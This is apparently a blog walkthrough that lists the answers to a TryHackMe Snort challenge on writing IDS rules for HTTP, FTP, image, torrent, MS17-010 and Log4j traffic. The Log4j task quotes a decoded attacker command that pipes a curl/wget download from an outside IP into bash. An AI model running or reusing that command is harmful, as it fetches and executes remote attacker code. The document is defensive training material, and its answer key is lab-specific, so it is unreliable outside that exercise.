Ciphers Security THM Walkthrough TryHackMe Walkthrough: Snort Challenge – The Basics
THM Walkthrough

TryHackMe Walkthrough: Snort Challenge – The Basics

  • by
  • February 4, 2025
  • 0 Comments
  • 5 minutes read
  • 20 Views
  • 20 hours ago
Snort Challenge - The Basics

The snort room invites you a challenge to investigate a series of traffic data and stop malicious activity under two different scenarios. Let’s start working with Snort to analyse live and captured traffic. We recommend completing the Snort room first, which will teach you how to use the tool in depth.

Task 2 Writing IDS Rules (HTTP) in Snort

Question: Write a single rule to detect “all TCP port 80 traffic” packets in the given pcap file. 

What is the number of detected packets?

Note: You must answer this question correctly before answering the rest of the questions in this task.
Answer: 164

Investigate the log file.

Question: What is the destination address of packet 63?
Answer: 216.239.59.99

Investigate the log file.

Question: What is the ACK number of packet 64?
Answer: 0x2E6B5384

Investigate the log file.

Question: What is the SEQ number of packet 62?
Answer: 0x36C21E28

Investigate the log file.

Question: What is the TTL of packet 65?
Answer: 128

Investigate the log file.

Question: What is the source IP of packet 65?
Answer: 145.254.160.237

Investigate the log file.

Question: What is the source port of packet 65?
Answer: 3372

Task 3 Writing IDS Rules (FTP)

Use the given pcap file.

Write a single rule to detect “all TCP port 21”  traffic in the given pcap.

Question: What is the number of detected packets?
Answer: 307

Investigate the log file.

Question: What is the FTP service name?
Answer: Microsoft FTP Service

Clear the previous log and alarm files.

Deactivate/comment on the old rules.

Write a rule to detect failed FTP login attempts in the given pcap.

Question: What is the number of detected packets?
Answer: 41

Clear the previous log and alarm files.

Deactivate/comment on the old rule.

Write a rule to detect successful FTP logins in the given pcap.

Question: What is the number of detected packets?
Answer: 1

Clear the previous log and alarm files.

Deactivate/comment on the old rule.

Write a rule to detect FTP login attempts with a valid username but no password entered yet.

Question: What is the number of detected packets?
Answer: 42

Clear the previous log and alarm files.

Deactivate/comment on the old rule.

Write a rule to detect FTP login attempts with the “Administrator” username but no password entered yet.

Question: What is the number of detected packets?
Answer: 7

Task 4 Writing IDS Rules (PNG)

Use the given pcap file.

Write a rule to detect the PNG file in the given pcap.

Question: Investigate the logs and identify the software name embedded in the packet.
Answer: Adobe ImageReady

Clear the previous log and alarm files.

Deactivate/comment on the old rule.

Write a rule to detect the GIF file in the given pcap.

Question: Investigate the logs and identify the image format embedded in the packet.
Answer: GIF89a

Task 5 Writing IDS Rules (Torrent Metafile)

Use the given pcap file.

Write a rule to detect the torrent metafile in the given pcap.

Question: What is the number of detected packets?
Answer: 2

Investigate the log/alarm files.

Question: What is the name of the torrent application?
Answer: bittorrent

Investigate the log/alarm files.

Question: What is the MIME (Multipurpose Internet Mail Extensions) type of the torrent metafile?
Answer: application/x-bittorrent

Investigate the log/alarm files.

Question: What is the hostname of the torrent metafile?
Answer: tracker2.torrentbox.com

Task 6 Troubleshooting Rule Syntax Errors

You can test each ruleset with the following command structure;

sudo snort -c local-X.rules -r mx-1.pcap -A console

Fix the syntax error in local-1.rules file and make it work smoothly.

Question: What is the number of the detected packets?
Answer: 16

Fix the syntax error in local-2.rules file and make it work smoothly.

Question: What is the number of the detected packets?
Answer: 68

Fix the syntax error in local-3.rules file and make it work smoothly.

Question: What is the number of the detected packets?
Answer: 87

Fix the syntax error in local-4.rules file and make it work smoothly.

Question: What is the number of the detected packets?
Answer: 90

Fix the syntax error in local-5.rules file and make it work smoothly.

Question: What is the number of the detected packets?
Answer: 155

Fix the logical error in local-6.rules file and make it work smoothly to create alerts.

Question: What is the number of the detected packets?
Answer: 2

Fix the logical error in local-7.rules file and make it work smoothly to create alerts.

Question: What is the name of the required option:
Answer: msg

Task 7 Using External Rules (MS17-010)

Use the given pcap file.

Use the given rule file (local.rules) to investigate the ms1710 exploitation.

Question: What is the number of detected packets?
Answer: 25154

Clear the previous log and alarm files.

Use local-1.rules empty file to write a new rule to detect payloads containing the “\IPC$” keyword.

Question: What is the number of detected packets?
Answer: 12

Investigate the log/alarm files.

Question: What is the requested path?
Answer: \192.168.116.138\IPC$

Question: What is the CVSS v2 score of the MS17-010 vulnerability?
Answer: 9.3

Task 8 Using External Rules (Log4j)

Use the given pcap file.

Use the given rule file (local.rules) to investigate the log4j exploitation.

Question: What is the number of detected packets?
Answer: 26

Investigate the log/alarm files.

Question: How many rules were triggered?.
Answer: 4

Investigate the log/alarm files.

Question: What are the first six digits of the triggered rule sids?
Answer: 210037

Clear the previous log and alarm files.

Use local-1.rules empty file to write a new rule to detect packet payloads between 770 and 855 bytes.

Question: What is the number of detected packets?
Answer: 41

Investigate the log/alarm files.

Question: What is the name of the used encoding algorithm?
Answer: Base64

Investigate the log/alarm files.

Question: What is the IP ID of the corresponding packet?
Answer: 62808

Investigate the log/alarm files.

Decode the encoded command.

Question: What is the attacker’s command?
Answer: (curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash

Question: What is the CVSS v2 score of the Log4j vulnerability?
Answer: 9.3

Task 9 Conclusion

Congratulations! Are you brave enough to stop a live attack in the Snort2 Challenge 2room?

Question: Read the task above.
Answer: No Answer Needed

If you have any queries regarding the above content, or you want to update anything in the content, then contact us with your queries. You can directly post your question in the group.

Connect with us on these platforms

Tags:

Share This Post:

Leave feedback about this

  • Quality
  • Price
  • Service

PROS

+
Add Field

CONS

+
Add Field
Choose Image
Choose Video

Related Post

Snort Challenge - Live Attacks
THM Walkthrough

TryHackMe Walkthrough: Snort Challenge – Live Attacks

February 4, 2025
TryHackMe Walkthrough: Snort, Network Security and Traffic Analysis
THM Walkthrough

TryHackMe Walkthrough: Snort, Network Security and Traffic Analysis

December 29, 2024
The Art of OS Discovery: How Banner Grabbing Reveals System Vulnerabilities 4
Scanning Network

The Art of OS Discovery: How Banner Grabbing Reveals

September 15, 2024
Techniques Used for discovering Ports and Services 39
Scanning Network

Techniques Used for discovering Ports and Services

September 15, 2024
TryHackMe Walkthrough: Network Security Protocols
THM Walkthrough

TryHackMe Walkthrough: Network Security Protocols

May 16, 2024
protocols and server 2
THM Walkthrough

TryHackMe Walkthrough: Protocols and Server 2

May 14, 2024